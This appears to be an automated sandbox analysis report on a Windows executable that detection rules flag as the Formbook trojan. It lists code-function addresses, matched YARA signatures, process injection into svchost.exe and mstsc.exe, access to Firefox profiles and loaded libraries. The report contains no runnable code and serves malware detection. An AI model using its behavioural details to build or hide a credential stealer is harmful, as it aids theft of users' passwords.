            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F452A01_2_02F452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F8739A1_2_02F8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2D34C1_2_02F2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF132D1_2_02FF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF70E91_2_02FF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF0E01_2_02FFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEF0CC1_2_02FEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F470C01_2_02F470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300B16B1_2_0300B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4B1B01_2_02F4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2F1721_2_02F2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7516C1_2_02F7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF16CC1_2_02FF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F856301_2_02F85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF7B01_2_02FFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F314601_2_02F31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF43F1_2_02FFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030095C31_2_030095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDD5B01_2_02FDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF75711_2_02FF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEDAC61_2_02FEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDDAAC1_2_02FDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F85AA01_2_02F85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE1AA31_2_02FE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB3A6C1_2_02FB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFA491_2_02FFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF7A461_2_02FF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB5BF01_2_02FB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7DBF91_2_02F7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5FB801_2_02F5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFB761_2_02FFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F438E01_2_02F438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAD8001_2_02FAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F499501_2_02F49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5B9501_2_02F5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD59101_2_02FD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F49EB01_2_02F49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F03FD21_2_02F03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F03FD51_2_02F03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFFB11_2_02FFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F41F921_2_02F41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFF091_2_02FFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFCF21_2_02FFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB9C321_2_02FB9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5FDC01_2_02F5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF7D731_2_02FF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF1D5A1_2_02FF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F43D401_2_02F43D40
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046024463_2_04602446
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045F44203_2_045F4420
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045FE4F63_2_045FE4F6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045505353_2_04550535
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046105913_2_04610591
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0456C6E03_2_0456C6E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045747503_2_04574750
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045507703_2_04550770
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0454C7C03_2_0454C7C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045E20003_2_045E2000
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045D81583_2_045D8158
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045EA1183_2_045EA118
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045401003_2_04540100
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046081CC3_2_046081CC
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046041A23_2_046041A2
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046101AA3_2_046101AA
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045F02743_2_045F0274
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045D02C03_2_045D02C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460A3523_2_0460A352
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046103E63_2_046103E6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0455E3F03_2_0455E3F0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04550C003_2_04550C00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04540CF23_2_04540CF2
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045F0CB53_2_045F0CB5
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045ECD1F3_2_045ECD1F
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0455AD003_2_0455AD00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0454ADE03_2_0454ADE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04568DBF3_2_04568DBF
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04550E593_2_04550E59
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460EE263_2_0460EE26
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460EEDB3_2_0460EEDB
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04562E903_2_04562E90
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460CE933_2_0460CE93
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045C4F403_2_045C4F40
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04570F303_2_04570F30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045F2F303_2_045F2F30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592F283_2_04592F28
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04542FC83_2_04542FC8
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045CEFA03_2_045CEFA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045528403_2_04552840
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0455A8403_2_0455A840
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0457E8F03_2_0457E8F0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045368B83_2_045368B8
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045669623_2_04566962
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0461A9A63_2_0461A9A6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045529A03_2_045529A0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0454EA803_2_0454EA80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460AB403_2_0460AB40
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04606BD73_2_04606BD7
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045414603_2_04541460
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460F43F3_2_0460F43F
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046075713_2_04607571
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046195C33_2_046195C3
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045ED5B03_2_045ED5B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045956303_2_04595630
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046016CC3_2_046016CC
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460F7B03_2_0460F7B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460F0E03_2_0460F0E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046070E93_2_046070E9
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045FF0CC3_2_045FF0CC
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045570C03_2_045570C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0461B16B3_2_0461B16B
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0453F1723_2_0453F172
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0458516C3_2_0458516C
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0455B1B03_2_0455B1B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0456B2C03_2_0456B2C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0456D2F03_2_0456D2F0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045F12ED3_2_045F12ED
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045552A03_2_045552A0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0453D34C3_2_0453D34C
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460132D3_2_0460132D
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0459739A3_2_0459739A
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045C9C323_2_045C9C32
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460FCF23_2_0460FCF2
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04607D733_2_04607D73
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04553D403_2_04553D40
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04601D5A3_2_04601D5A
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0456FDC03_2_0456FDC0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04559EB03_2_04559EB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460FF093_2_0460FF09
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04513FD23_2_04513FD2
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04513FD53_2_04513FD5
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04551F923_2_04551F92
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460FFB13_2_0460FFB1
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045BD8003_2_045BD800
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045538E03_2_045538E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045599503_2_04559950
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0456B9503_2_0456B950
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045E59103_2_045E5910
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04607A463_2_04607A46
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460FA493_2_0460FA49
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045C3A6C3_2_045C3A6C
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045FDAC63_2_045FDAC6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045EDAAC3_2_045EDAAC
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04595AA03_2_04595AA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045F1AA33_2_045F1AA3
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460FB763_2_0460FB76
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0458DBF93_2_0458DBF9
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045C5BF03_2_045C5BF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0456FB803_2_0456FB80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00171B503_2_00171B50
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0016CA793_2_0016CA79
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0016CA803_2_0016CA80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0016CCA03_2_0016CCA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0016AD203_2_0016AD20
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_001751E03_2_001751E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_001733C03_2_001733C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0018B7B03_2_0018B7B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_042B540C3_2_042B540C
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_042AE4953_2_042AE495
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_042AE3783_2_042AE378
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_042B3F693_2_042B3F69
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_042AE8333_2_042AE833
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_042AD8983_2_042AD898
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_042ACA833_2_042ACA83
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_042ACB583_2_042ACB58
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B970 appears 262 times
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04597E54 appears 107 times
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 045CF290 appears 103 times
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0453B970 appears 262 times
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04585130 appears 58 times
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 045BEA12 appears 86 times
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: String function: 00790C63 appears 70 times
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: String function: 00777F41 appears 35 times
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: String function: 00798A80 appears 42 times
            Source: rP0n___87004354.exe, 00000000.00000003.1699565720.000000000432D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rP0n___87004354.exe
            Source: rP0n___87004354.exe, 00000000.00000003.1700289327.00000000039C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rP0n___87004354.exe
            Source: rP0n___87004354.exe, 00000000.00000003.1700702089.00000000039C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rP0n___87004354.exe
            Source: rP0n___87004354.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.2490000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3547541019.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1817399152.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3546547268.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3547479377.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.3547465093.00000000055B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/4@11/8
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DA0F4 GetLastError,FormatMessageW,0_2_007DA0F4
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007C84F3 AdjustTokenPrivileges,CloseHandle,0_2_007C84F3
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007C8AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_007C8AA3
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DB3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_007DB3BF
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007EEF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_007EEF21
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DC423 CoInitialize,CoCreateInstance,CoUninitialize,0_2_007DC423
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00774FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00774FE9
            Source: C:\Users\user\Desktop\rP0n___87004354.exeFile created: C:\Users\user\AppData\Local\Temp\retrofitsJump to behavior
            Source: rP0n___87004354.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\rP0n___87004354.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: mstsc.exe, 00000003.00000002.3546768186.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1993003814.00000000005F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: rP0n___87004354.exeReversingLabs: Detection: 73%
            Source: unknownProcess created: C:\Users\user\Desktop\rP0n___87004354.exe "C:\Users\user\Desktop\rP0n___87004354.exe"
            Source: C:\Users\user\Desktop\rP0n___87004354.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rP0n___87004354.exe"
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
            Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\rP0n___87004354.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rP0n___87004354.exe"Jump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rP0n___87004354.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\rP0n___87004354.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rP0n___87004354.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\rP0n___87004354.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\rP0n___87004354.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\rP0n___87004354.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rP0n___87004354.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\rP0n___87004354.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rP0n___87004354.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rP0n___87004354.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rP0n___87004354.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: credui.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: ktmw32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: profapi.dllJump to behavior
